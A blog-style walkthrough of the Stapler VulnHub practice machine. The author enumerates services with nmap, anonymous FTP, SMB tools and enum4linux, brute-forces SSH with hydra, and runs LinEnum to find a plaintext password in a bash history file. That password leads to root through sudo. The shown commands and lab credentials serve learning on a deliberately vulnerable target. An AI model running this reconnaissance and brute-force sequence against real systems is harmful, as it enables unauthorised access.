Stapler is also a vulnerable machine which can de found on vulnhub. https://www.vulnhub.com/entry/stapler-1,150/

To start of the machine I had to use nmap again, since netdiscover didn’t found any IP adresses. There probably is something wrong with netdiscover on my kali machine.

The nmap results are quite large, lets have a look. We got port 20, 21, 22, 53, 80, 123, 137, 138, 139, 666, 3306 and 12380

root@pentest:~# nmap -sV -sC -p- 192.168.229.133                                                                                                    
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 15:38 CET                                                                                     
Nmap scan report for 192.168.229.133                                                                                                                
Host is up (0.00020s latency).                                                                                                                      
Not shown: 65523 filtered ports                                                                                                                     
PORT      STATE  SERVICE     VERSION                                                                                                                
20/tcp    closed ftp-data                                                                                                                           
21/tcp    open   ftp         vsftpd 2.0.8 or later                                                                                                  
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                                              
|_Can't get directory listing: PASV failed: 550 Permission denied.                                                                                  
| ftp-syst:                                                                                                                                         
|   STAT:                                                                                                                                           
| FTP server status:                                                                                                                                
|      Connected to 192.168.229.129                                                                                                                 
|      Logged in as ftp                                                                                                                             
|      TYPE: ASCII                                                                                                                                  
|      No session bandwidth limit                                                                                                                   
|      Session timeout in seconds is 300                                                                                                            
|      Control connection is plain text                                                                                                             
|      Data connections will be plain text                                                                                                          
|      At session startup, client count was 1                                                                                                       
|      vsFTPd 3.0.3 - secure, fast, stable                                                                                                          
|_End of status                                                                                                                                     
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)                                                                    
| ssh-hostkey:                                                                                                                                      
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)                                                                                      
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)                                                                                     
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|   NSID: kbwzcnsnl22 (6b62777a636e736e6c3232)
|   id.server: kbwzcnsnl22
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
38/tcp   closed netbios-dgm                                                                                                                [60/164]
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: SupportsTransactions, SupportsCompression, InteractiveClient, Support41Auth, LongColumnFlag, ConnectWithDatabase, LongPasswor
d, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, FoundRows, SupportsLoadData
Local, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: cWl<YYnF"r\x03K>l!":X\x1D}
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
--snip--
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 0s, median: 59m59s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2020-01-17T15:39:59+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-17T15:39:59
|_  start_date: N/A

So lets have a look at the webpages on port 80 and port 12380 first.

Seems empty, lets run dirb on both ports and see what we can find.

Nothing interesting in those files. Lets run nikto and see what we can find. We run both ports but lets have a look at port 80. The bashrc file and the profile file is what we already found, nothing to interesting in there.

In the scan on port 12380 we found some more interesting stuff:

I cant seem to open robots.txt since it will redirect me instantly. same for phpmyadmin. This sucks. Lets look to the other services.

Going back to our nmap results, we can see that port 21 is open and it allows anonymous ftp, lets have a look by connecting to it. Then supplying the user anonymous and an empty password. We are in and there is a file called note.

Lets use get note to transfer the file to our vm and cat the file.

Nothing of to much interest. But we have already found 3 names. Elly, John and Harry. It might be worth writing these down in a file for possible bruteforcing later. Lets write them in a file named usernames.txt

After looking back to the nmap results I figured that I should probably do some SMB enumeration. A guide that helped me with is can be found on: https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/. While looking and using most of the commands. This is the interesting information I could find:

root@pentest:~# nmblookup -A 192.168.229.133                                                                                                             
Looking up status of 192.168.229.133                                                                                                                     
        RED             <00> -         H <ACTIVE> 
        RED             <03> -         H <ACTIVE> 
        RED             <20> -         H <ACTIVE> 
        ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> 
        WORKGROUP       <00> - <GROUP> H <ACTIVE> 
        WORKGROUP       <1d> -         H <ACTIVE> 
        WORKGROUP       <1e> - <GROUP> H <ACTIVE> 

        MAC Address = 00-00-00-00-00-00

root@pentest:~# nbtscan 192.168.229.133
Doing NBT name scan for addresses from 192.168.229.133
IP address       NetBIOS Name     Server    User             MAC address       
------------------------------------------------------------------------------
192.168.229.133  RED              <server>  RED              00:00:00:00:00:00

root@pentest:~# smbclient -L 192.168.229.133
Enter WORKGROUP\root's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

root@pentest:~# smbclient //192.168.229.133/kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

Well interesting, lets try to get these files and lets have a look at them. I used the get command to get the files.

smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 17:02:27 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 17:02:27 2016

                19478204 blocks of size 1024. 16394572 blocks available
smb: \kathy_stuff\> get to-do-list.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \kathy_stuff\to-do-list.txt
smb: \kathy_stuff\> cd ../backup
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 17:04:14 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 17:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 19:14:46 2015

                19478204 blocks of size 1024. 16394572 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (342.4 KiloBytes/sec) (average 342.4 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (53683.4 KiloBytes/sec) (average 46813.8 KiloBytes/sec)

Before looking at these files. We found two more names in the SMB part. Fred and Kathy (see screenshot below) lets add these to our usernames.txt

the todo-list.txt says: I'm making sure to backup anything important for Initech, Kathy. Interesting…. So in the backupfile wordpress-4.tar.gz is probably some important files. But I couldn’t find anything to interesting.

With Enum4Linux we found some more users and the information we found before.

S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

By using the following command we keep just the users, delete the rest of the info and we send them to our usernames.txt. root@pentest:~# cat users.txt | cut -d '\' -f2 | cut -d ' ' -f1 >> usernames.txt

Since I couldn’t find anything interesting, lets try to bruteforce the SSH service with hydra, and we found something.

So lets SSH into the machine with the user SHayslett and password SHayslett. Succesfull, we are in the machine. But we aren’t root yet!

Like the previous machine, I normally did the steps manually but I really want to use a script sometime to see what it can find easily. Lets use the unix-privchecker-script we put into our /var/www/html folder so we can download it on the machine. We have to start apache2 again since we restarted Kali since our previous challange. This can be done with service apache2 start. We should go into the /tmp directory, wget the file and make it executable.

Well unix-priv-esc didn’t work but we could clone Linenum and run it. Lets go through the output and this is what i found interesting:

[-] It looks like we have some admin users:                                                                                                              
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)                                                                                                
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

[-] Accounts that have recently used sudo:                                                                                                               
/home/peter/.sudo_as_admin_successful

[-] Location and contents (if accessible) of .bash_history file(s):
--snip--
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
--snip--

So it seems like we got the password from peter, and he might be an admin user. Lets SSH into his account and see;

So I tried to change the user to root with the sudo su command and it seems like we are root, lets go to the home directory and we can cat the flag.txt. Challenge done 🙂 Lets read some walk-throughs to find some other ways to root/access the box. I found that this https://ivanitlearning.wordpress.com/2019/11/22/vulnhub-stapler-walkthrough-pt-2/ is good to read after completing the box.

Some learning points after reading other walk-throughs:

  • Check if your browser is going through http or https. You could get to the https://192.168.229.133:12380/blogblog/ url with https. But not with http.

Leave a Reply

Your email address will not be published. Required fields are marked *